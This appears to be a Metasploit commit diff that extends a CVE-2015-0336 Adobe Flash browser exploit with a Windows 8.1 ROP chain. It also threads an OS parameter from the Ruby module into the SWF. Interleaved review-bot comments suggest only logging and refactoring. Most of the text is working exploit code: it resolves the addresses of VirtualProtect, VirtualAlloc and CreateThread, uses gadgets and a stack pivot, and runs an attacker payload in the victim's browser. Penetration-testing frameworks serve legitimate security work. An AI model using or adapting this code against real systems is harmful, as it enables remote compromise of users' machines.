diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf
index f8492e42e8..8a05ef2a53 100644
Binary files a/data/exploits/CVE-2015-0336/msf.swf and b/data/exploits/CVE-2015-0336/msf.swf differ
diff --git a/external/source/exploits/CVE-2015-0336/Exploit.as b/external/source/exploits/CVE-2015-0336/Exploit.as
index 9886106f71..01f0f9279f 100644
--- a/external/source/exploits/CVE-2015-0336/Exploit.as
+++ b/external/source/exploits/CVE-2015-0336/Exploit.as
@@ -30,12 +30,14 @@ package
 private var b64:Base64Decoder = new Base64Decoder()
 private var payload:ByteArray
 private var platform:String
+private var os:String
 private var original_length:uint = 0
 public function Exploit()
 {
 var i:uint = 0
 platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+os = LoaderInfo(this.root.loaderInfo).parameters.os
 trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
 var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
 var pattern:RegExp = / /g;
@@ -118,8 +120,9 @@ package
 return
 }
-exploiter = new Exploiter(this, platform, payload, uv)
+exploiter = new Exploiter(this, platform, os, payload, uv)
 }
+}
 }
diff --git a/external/source/exploits/CVE-2015-0336/Exploiter.as b/external/source/exploits/CVE-2015-0336/Exploiter.as
index a56ca190ee..9975dc8b6e 100644
--- a/external/source/exploits/CVE-2015-0336/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0336/Exploiter.as
@@ -11,6 +11,7 @@ package
 private var eba:ExploitByteArray
 private var payload:ByteArray
 private var platform:String
+private var op_system:String
 private var pos:uint
 private var byte_array_object:uint
 private var main:uint
@@ -25,11 +26,12 @@ package
 private var payload_space:Vector. = new Vector.(0x6400)
 private var spray:Vector. = new Vector.(89698)
-public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.):void
+public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.):void
 {
 exploit = exp
 payload = p
 platform = pl
+op_system = os
 ev = new ExploitVector(uv)
 if (!ev.is_ready()) return
@@ -133,12 +135,19 @@ package
 private function do_rop():void
 {
 Logger.log("[*] Exploiter - do_rop()")
-if (platform == "linux")
+if (platform == "linux") {
 do_rop_linux()
-else if (platform == "win")
-do_rop_windows()
-else
+} else if (platform == "win") {
+if (op_system == "Windows 8.1") {
+do_rop_windows8()
+} else if (op_system == "Windows 7") {
+do_rop_windows()
+} else {
+return
+}
+} else {
 return
+}
 }
 private function do_rop_windows():void
@@ -150,7 +159,6 @@ package
 var kernel32:uint = pe.module("kernel32.dll", winmm)
 var ntdll:uint = pe.module("ntdll.dll", kernel32)
 var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
-var winexec:uint = pe.procedure("WinExec", kernel32)
 var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
 var createthread:uint = pe.procedure("CreateThread", kernel32)
 var memcpy:uint = pe.procedure("memcpy", ntdll)
@@ -182,14 +190,14 @@ package
 // VirtualAlloc
 eba.write(0, memcpy)
-eba.write(0, 0x70000000)
+eba.write(0, 0x7f6e0000)
 eba.write(0, 0x4000)
 eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
 eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 // memcpy
 eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-eba.write(0, 0x70000000)
+eba.write(0, 0x7f6e0000)
 eba.write(0, payload_address + 8)
 eba.write(0, payload.length)
@@ -198,7 +206,7 @@ package
 eba.write(0, buffer + 0x10) // return to fix things
 eba.write(0, 0)
 eba.write(0, 0)
-eba.write(0, 0x70000000)
+eba.write(0, 0x7f6e0000)
 eba.write(0, 0)
 eba.write(0, 0)
 eba.write(0, 0)
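Review bot: The two `return` fall-through branches added to do_rop() abort silently when `platform` is "win" but `op_system` is neither "Windows 8.1" nor "Windows 7", whereas every other path in this class announces itself through Logger.log; add `Logger.log("[-] Exploiter - unsupported platform/os: " + platform + "/" + op_system)` before each `return` so a mismatched `os` parameter shows up in the log instead of looking like a generic failure. `op_system` is the raw `os` loader parameter copied in the constructor hunk above, so the exact-string comparison is only as good as whatever the calling module sends; a comment on the new field such as `// must equal the os_name string passed by the Ruby module: "Windows 7" or "Windows 8.1"` would pin that contract where the next maintainer will see it.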
@@ -207,6 +215,73 @@ package
 exploit.toString() // call method in the fake vtable
 }
+private function do_rop_windows8():void
+{
+Logger.log("[*] Exploiter - do_rop_windows8()")
+var pe:PE = new PE(eba)
+var flash:uint = pe.base(vtable)
+var winmm:uint = pe.module("winmm.dll", flash)
+var advapi32:uint = pe.module("advapi32.dll", flash)
+var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+var kernel32:uint = pe.module("kernel32.dll", winmm)
+var ntdll:uint = pe.module("ntdll.dll", kernel32)
+var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+var createthread:uint = pe.procedure("CreateThread", kernelbase)
+var memcpy:uint = pe.procedure("memcpy", ntdll)
+var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+
+// Continuation of execution
+eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+eba.write(0, "\x89\x03", false) // mov [ebx], eax
+eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+// Put the payload (command) in memory
+eba.write(payload_address + 8, payload, true); // payload
+
+// Put the fake vtabe / stack on memory
+eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
+eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+eba.write(0, virtualprotect)
+
+// VirtualProtect
+eba.write(0, virtualalloc)
+eba.write(0, buffer + 0x10)
+eba.write(0, 0x1000)
+eba.write(0, 0x40)
+eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+// VirtualAlloc
+eba.write(0, memcpy)
+eba.write(0, 0x7ffd0000)
+eba.write(0, 0x4000)
+eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+// memcpy
+eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+eba.write(0, 0x7ffd0000)
+eba.write(0, payload_address + 8)
+eba.write(0, payload.length)
+
+// CreateThread
+eba.write(0, createthread)
+eba.write(0, buffer + 0x10) // return to fix things
+eba.write(0, 0)
+eba.write(0, 0)
+eba.write(0, 0x7ffd0000)
+eba.write(0, 0)
+eba.write(0, 0)
+eba.write(0, 0)
+
+eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+exploit.toString() // call method in the fake vtable
+}
+
 private function do_rop_linux():void
 {
 Logger.log("[*] Exploiter - do_rop_linux()")
@@ -241,8 +316,6 @@ package
 eba.write(0, "\x5f", false) // pop edi
 eba.write(0, "\x5e", false) // pop esi
 eba.write(0, "\xc3", false) // ret
-
-// eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
 // Put the popen parameters in memory
 eba.write(payload_address + 0x8, payload, true) // false
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 67bcc9fdc4..f95e2f8dba 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
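Review bot: do_rop_windows8() is a near-verbatim copy of do_rop_windows() — the visible differences are the module the three Win32 procedures are resolved from (kernelbase.dll instead of kernel32.dll) and the fixed address 0x7ffd0000 in place of 0x7f6e0000 — and nothing in the new function says why either differs. The earlier hunks already had to change the same constant in three places inside do_rop_windows(), and that kind of edit now has to be kept in sync across two copies, so a header comment such as `// Windows 8.1 variant of do_rop_windows(): resolves from kernelbase.dll and uses a different fixed address — presumably because kernel32's entries are forwarders on 8.1; confirm` is the minimum, and hoisting the shared body into one helper that takes the lookup module and the address as parameters would remove the duplication. The comment `// Put the fake vtabe / stack on memory` has a typo (`vtable`).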
@@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
 :arch => ARCH_X86,
 :os_name => lambda do |os|
 os =~ OperatingSystems::Match::LINUX ||
-os =~ OperatingSystems::Match::WINDOWS_7
+os =~ OperatingSystems::Match::WINDOWS_7 ||
+os =~ OperatingSystems::Match::WINDOWS_81
 end,
 :ua_name => lambda do |ua|
 case target.name
@@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
 target_payload = get_payload(cli, target_info)
 b64_payload = Rex::Text.encode_base64(target_payload)
+os_name = target_info[:os_name]
 if target.name =~ /Windows/
 platform_id = 'win'
@@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
- + - +
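Review bot: `os_name = target_info[:os_name]` is taken straight from the browser-detection result, presumably to be handed to the SWF as the `os` loader parameter, yet nothing documents which values the ActionScript side accepts; Exploiter.do_rop() compares that string byte-for-byte against "Windows 7" and "Windows 8.1" and returns silently on anything else, so any other spelling coming out of the OperatingSystems::Match detection would make the module fail with no message. Add a comment on this line, `# handed to the SWF as 'os'; must match the literals checked in Exploiter.as do_rop()`, and consider normalising here — mapping the WINDOWS_7 / WINDOWS_81 match to one of the two accepted strings — rather than trusting the raw detection string. The later hunk where os_name is actually passed to the SWF did not survive on this page, so that part of the change could not be checked.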